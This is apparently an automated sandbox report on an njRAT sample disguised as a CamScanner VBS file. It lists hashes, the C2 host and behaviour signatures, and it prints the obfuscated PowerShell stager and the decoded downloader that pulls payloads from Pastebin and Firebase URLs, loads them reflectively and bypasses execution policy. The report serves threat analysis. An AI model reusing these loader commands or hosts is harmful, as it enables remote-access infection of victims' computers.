Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1796s -
max time network
1797s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-es -
resource tags
-
submitted
10/12/2024, 16:09
General
-
Target
CamScanner#0612202415110000000000000000.vbs
-
Size
4.4MB
-
MD5
6c76b8c6d878af510014be1ca2f8b9d1
-
SHA1
9ed0189834cc5cc28d13f60232734877a36af5c4
-
SHA256
5214fe5938d6670d53b13d226af4b57c7aa6ec5e4a62c86e19eb8cffc2c23087
-
SHA512
d0e2476fd7256ec719236e33cf82bd079458272ad335c30bc092a7bda6527da24d4b04a82cbd477d53d28962d97c3097891a47aedb84b4dee4712954b256e7a5
-
SSDEEP
384:ByWyOyWyOyWyOyWyOyWyOyWyOyWyOyWyOyWyOyWyOyWyOyWyOyWyOyWyOyWyOyWp:DbCOFR
Malware Config
Extracted
https://pastebin.com/raw/pHPmwBp6
https://pastebin.com/raw/pHPmwBp6
Extracted
njrat
0.7NC
NYAN CAT
carlitosmoreno1794.duckdns.org:2019
bde06c84e1de4b23b
-
reg_key
bde06c84e1de4b23b
-
splitter
@!#&^%$
Signatures
-
Njrat family
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 4 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CamScanner#0612202415110000000000000000.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★BI★F★★bQB3★EI★c★★2★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★FQ★ZQBo★HU★b★Bj★Gg★ZQBz★Fg★e★BY★Hg★e★★u★EM★b★Bh★HM★cw★x★Cc★Jw★g★Ck★LgBH★GU★d★BN★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBl★HQ★a★Bv★GQ★K★★g★Cc★JwBN★HM★cQBC★Ek★YgBZ★Cc★Jw★g★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★C★★J★Bu★HU★b★Bs★C★★L★★g★Fs★bwBi★Go★ZQBj★HQ★WwBd★F0★I★★o★C★★Jw★n★GI★O★★y★Dg★Nw★0★D★★Yg★1★DY★YQ★3★C0★YQ★1★Dk★Yg★t★DQ★Z★★x★DQ★LQ★w★DE★Mg★w★C0★MQ★0★DY★M★Bj★GM★O★★5★D0★bgBl★Gs★bwB0★CY★YQBp★GQ★ZQBt★D0★d★Bs★GE★PwB0★Hg★d★★u★GU★cgBi★HU★d★Bj★G8★b★B1★Ho★YQ★v★G8★LwBt★G8★Yw★u★HQ★bwBw★HM★c★Bw★GE★Lg★z★D★★Mg★y★Dc★LQBl★HI★YgB1★HQ★YwBv★C8★Yg★v★D★★dg★v★G0★bwBj★C4★cwBp★H★★YQBl★Gw★ZwBv★G8★Zw★u★GU★ZwBh★HI★bwB0★HM★ZQBz★GE★YgBl★HI★aQBm★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★dwBk★G8★YgB4★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\CamScanner#0612202415110000000000000000.vbs');powershell $Yolopolhggobek;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pHPmwBp6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''TehulchesXxXxx.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''b828740b56a7-a59b-4d14-0120-1460cc89=nekot&aidem=tla?txt.erbutcoluza/o/moc.topsppa.30227-erbutco/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\CamScanner#0612202415110000000000000000.vbs'' , ''_____wdobx_______________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps14⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD56bf07852cb3bab59e6cc2dcab43ab011
SHA1310635401d2c6a1bd7f77df365eb6371012aee2c
SHA2565d968265d8f24ff9f80784bc6f3b5af2437781bce2b3d850db4a2bb49d0b5ad7
SHA5128dc9aec471dbd68818ed6fec05efc6570dbddbed22946765d45d4bd5482814e306674df3f3ca0845828fcc0d604d685fcec0f3f7ad9e982b30aaaa39d26134a9
-
Filesize
1KB
MD574fd3bb20b5c047c4ef9ff119744dc1f
SHA126ffb8c890a071c7c73c7e90789c4f2f709ddb2d
SHA256950d6a3f91c5f3f823e14f14390f1ad57ddf504256262a778ca1ebe1fb91d2cf
SHA512f1600c164f93cafa4b0e393892b386bf0ef98939316aabf9a90106b8fa3116adae2745a0c8037e72532e2462b973cf8aabb89ceecf9c469d0a2b0a3194c9ae3e
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
150B
MD56dcec303668c3787e752fe1543d8b363
SHA1db1aaa74faf3732ee4668a2176336325eda0b963
SHA2564fe909ba88e334b785aa82f1d7e3923571b58f5d23710961462766bad60393e7
SHA512a90b45732c6b6464e8a9e7bc3eba1594f7e65cecfa935650a668b4aa4c3bf5712a707d98d955a78eed9e2c237160b41cb272c29d4a62dfa1d025591eb3c7a477
-
Filesize
294KB
MD52e5d260ed4db92bb84faa322823c3ad3
SHA139d2c0b9cf6c2bb784981324ec1616cfb7a4ed69
SHA2565346ce49627b3f2b2deeb33856068fa56c43defd7f6121738416c0d512e4ca89
SHA512363b4a04abef0cfac0d6781eaa979bc7979bb7609a7f6bc2e521c253b57be74c86d85ff58c1e596e6455f552eb361238ef8b05b8f2a5be0870253fbb7cf44f3e
-
Filesize
1KB
MD5ceeb81f36d5e08cd83475ae80d8c757e
SHA1bdf2635e14154779670da259ffbf496170d00868
SHA2561a645212356d123988998315b0842fa8e3559658fd5f87d0cef1f149fef58c1b
SHA5127a8b712c6da5aaba63ab52f6b785aec4b57423132cf70837522ae8fdd4324b2bda1ff2e259f6792dcd4d34d8271bc5566161ec3dd7fac41519d2017ffc7d5aa6
-
Filesize
520KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
1.0MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
624KB
-
Filesize
48KB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
1.0MB
-
Filesize
40KB
-
Filesize
408KB
-
Filesize
88KB
-
Filesize
88KB